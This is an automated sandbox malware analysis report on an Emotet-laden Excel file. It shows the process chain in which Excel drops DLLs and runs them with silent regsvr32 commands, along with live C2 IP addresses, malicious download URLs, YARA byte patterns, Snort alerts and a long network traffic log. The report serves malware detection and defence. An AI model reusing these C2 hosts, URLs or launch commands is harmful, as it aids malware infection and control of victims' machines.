Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO0000001552.xls

Overview

General Information

Sample Name:PO0000001552.xls
Analysis ID:745091
MD5:ecdc3f1e9afd2ce212a12ba3a844f521
SHA1:0121ba555dfe0b42834759d201cce505bd619f86
SHA256:1e494fd9ec670e351dd80258489770ffa43ee6f4be3e14c797f7ce64ae8e9d43
Infos:

Detection

Emotet
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Document exploit detected (creates forbidden files)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Snort IDS alert for network traffic
Creates an autostart registry key pointing to binary in C:\Windows
Creates multiple autostart registry keys
Office process drops PE file
C2 URLs / IPs found in malware configuration
Drops PE files to the user root directory
Hides that the sample has been downloaded from the Internet (zone.identifier)
Document exploit detected (process start blacklist hit)
Document exploit detected (UrlDownloadToFile)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Potential document exploit detected (performs DNS queries)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Downloads executable code via HTTP
Drops files with a non-matching file extension (content does not match file extension)
Potential document exploit detected (unknown TCP traffic)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Connects to several IPs in different countries
Registers a DLL
Drops PE files to the user directory
Found large amount of non-executed APIs
Potential document exploit detected (performs HTTP gets)

Classification

  • System is w10x64_ra
  • EXCEL.EXE (PID: 4380 cmdline: C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO0000001552.xls MD5: 23CAD504B3E04BB54CD636AD2874041A)
    • regsvr32.exe (PID: 6588 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv1.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)
    • regsvr32.exe (PID: 6608 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv2.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6676 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\XEzXl\JZazaZgAOY.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
    • regsvr32.exe (PID: 6756 cmdline: C:\Windows\System32\regsvr32.exe /S ..\elv3.ooocccxxx MD5: 578BAB56836A3FE455FFC7883041825B)
      • regsvr32.exe (PID: 6792 cmdline: C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GanZhs\FrugrCuQjdEr.dll" MD5: 578BAB56836A3FE455FFC7883041825B)
  • cleanup
{"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}
SourceRuleDescriptionAuthorStrings
PO0000001552.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x146aa:$s1: Excel
  • 0x1573f:$s1: Excel
  • 0x35d0:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
SourceRuleDescriptionAuthorStrings
0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
    0000000A.00000002.2414500170.0000000000BBB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Emotet_3Yara detected EmotetJoe Security
      00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000008.00000002.1291594477.0000000180001000.00000020.00001000.00020000.00000000.sdmpWindows_Trojan_Emotet_db7d33faunknownunknown
        • 0x171c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
        • 0x2a90c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
        • 0x24ac0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B
        • 0x1b568:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
        • 0x216e4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3
        • 0x2ae01:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
        • 0x24ad4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
        00000008.00000002.1290019980.0000000000980000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          Click to see the 1 entries
          SourceRuleDescriptionAuthorStrings
          8.2.regsvr32.exe.980000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            8.2.regsvr32.exe.980000.0.unpackWindows_Trojan_Emotet_db7d33faunknownunknown
            • 0x169c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x2a10c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
            • 0x242c0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B
            • 0x1ad68:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
            • 0x20ee4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3
            • 0x2a601:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
            • 0x242d4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
            8.2.regsvr32.exe.980000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              8.2.regsvr32.exe.980000.0.raw.unpackWindows_Trojan_Emotet_db7d33faunknownunknown
              • 0x175c2:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
              • 0x2ad0c:$chunk_0: 4C 8D 9C 24 80 00 00 00 8B C3 49 8B 5B 10 49 8B 73 18 49 8B 7B 20 49 8B E3 5D C3
              • 0x24ec0:$chunk_1: 8B C7 41 0F B7 4C 45 00 41 8B 1C 8C 48 03 DD 48 3B DE 72 1B
              • 0x1b968:$chunk_2: 48 8B C4 48 89 48 08 48 89 50 10 4C 89 40 18 4C 89 48 20 C3
              • 0x21ae4:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 18 40 0F 95 C7 8B C7 49 8B 7B 20 49 8B E3 5D C3
              • 0x2b201:$chunk_4: 48 39 3B 4C 8D 9C 24 80 00 00 00 49 8B 5B 10 49 8B 73 20 40 0F 95 C7 8B C7 49 8B 7B 28 49 8B E3 5D C3
              • 0x24ed4:$chunk_6: 43 8B 84 FE 8C 00 00 00 48 03 C6 48 3B D8 73 0B
              No Sigma rule has matched
              Timestamp:192.168.2.3182.162.143.56497124432404316 11/13/22-19:28:07.391953
              SID:2404316
              Source Port:49712
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.345.63.99.234970970802404334 11/13/22-19:27:51.342965
              SID:2404334
              Source Port:49709
              Destination Port:7080
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:192.168.2.31.1.1.163177532023883 11/13/22-19:27:02.730666
              SID:2023883
              Source Port:63177
              Destination Port:53
              Protocol:UDP
              Classtype:Potentially Bad Traffic
              Timestamp:192.168.2.3173.255.211.88497054432404314 11/13/22-19:27:33.992872
              SID:2404314
              Source Port:49705
              Destination Port:443
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: PO0000001552.xlsVirustotal: Detection: 66%Perma Link
              Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/FAvira URL Cloud: Label: malware
              Source: https://182.162.143.56/qqvehgyxm/bitss/ktcpnaio/Avira URL Cloud: Label: malware
              Source: http://ly.yjlianyi.top/wp-admin/4cChao/Avira URL Cloud: Label: malware
              Source: http://sbm.xinmoshiwang.com/upload/VaOfWEb3pW76UO/Avira URL Cloud: Label: malware
              Source: https://182.162.143.56/tkafmhcgcid/Avira URL Cloud: Label: malware
              Source: https://182.162.143.56/Avira URL Cloud: Label: malware
              Source: sbm.xinmoshiwang.comVirustotal: Detection: 13%Perma Link
              Source: datie-tw.comVirustotal: Detection: 10%Perma Link
              Source: copunupo.ac.zmVirustotal: Detection: 17%Perma Link
              Source: ly.yjlianyi.topVirustotal: Detection: 13%Perma Link
              Source: 0000000C.00000002.2414304563.00000000009BB000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["173.255.211.88:443", "45.63.99.23:7080", "182.162.143.56:443", "91.187.140.35:8080", "212.24.98.99:8080", "119.59.103.152:8080", "45.235.8.30:8080", "172.104.251.154:8080", "72.15.201.15:8080", "169.57.156.166:8080", "103.75.201.2:443", "213.239.212.5:443", "164.90.222.65:443", "201.94.166.162:443", "94.23.45.86:4143", "183.111.227.137:8080", "186.194.240.217:443", "107.170.39.149:8080", "147.139.166.154:8080", "5.135.159.50:443", "206.189.28.199:8080", "104.168.155.143:8080", "129.232.188.93:443", "82.223.21.224:8080", "103.43.75.120:443", "103.132.242.26:8080", "139.59.56.73:8080", "164.68.99.3:8080", "202.129.205.3:8080", "167.172.199.165:8080", "110.232.117.186:8080", "209.97.163.214:443", "167.172.253.162:8080", "1.234.2.232:8080", "159.65.88.10:8080", "95.217.221.146:8080", "153.92.5.27:8080", "91.207.28.33:8080", "188.44.20.25:443", "153.126.146.25:7080", "163.44.196.120:8080", "172.105.226.75:8080", "115.68.227.76:8080", "159.65.140.115:443", "139.59.126.41:443", "197.242.150.244:8080", "45.176.232.124:443", "45.118.115.99:8080", "149.56.131.28:8080", "79.137.35.198:8080", "173.212.193.249:8080", "160.16.142.56:8080", "159.89.202.34:443", "185.4.135.165:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5kCHHpgAjAJA=", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2ayEIpgAYAJA="]}
              Source: unknownHTTPS traffic detected: 175.98.167.165:443 -> 192.168.2.3:49697 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 41.63.0.22:443 -> 192.168.2.3:49701 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 182.162.143.56:443 -> 192.168.2.3:49713 version: TLS 1.2

              Software Vulnerabilities

              barindex
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: EvvmhfKiKFhKrSuHfBq[1].dll.0.drJump to dropped file
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\CE8D676K\EvvmhfKiKFhKrSuHfBq[1].dllJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\o0oHPECmC0WPIXcvQPJOXzFOO7w00z7mkDO[1].dllJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\98S549LJ\2yXcjy57oZTTUNweDidCGUY[1].dllJump to behavior
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
              Source: C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
              Source: global trafficDNS query: name: datie-tw.com
              Source: global trafficDNS query: name: sbm.xinmoshiwang.com
              Source: global trafficDNS query: name: copunupo.ac.zm
              Source: global trafficDNS query: name: ly.yjlianyi.top
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 175.98.167.165:443 -> 192.168.2.3:49697
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49697 -> 175.98.167.165:443
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
              Source: global trafficTCP traffic: 47.92.35.35:80 -> 192.168.2.3:49699
              Source: global trafficTCP traffic: 192.168.2.3:49699 -> 47.92.35.35:80
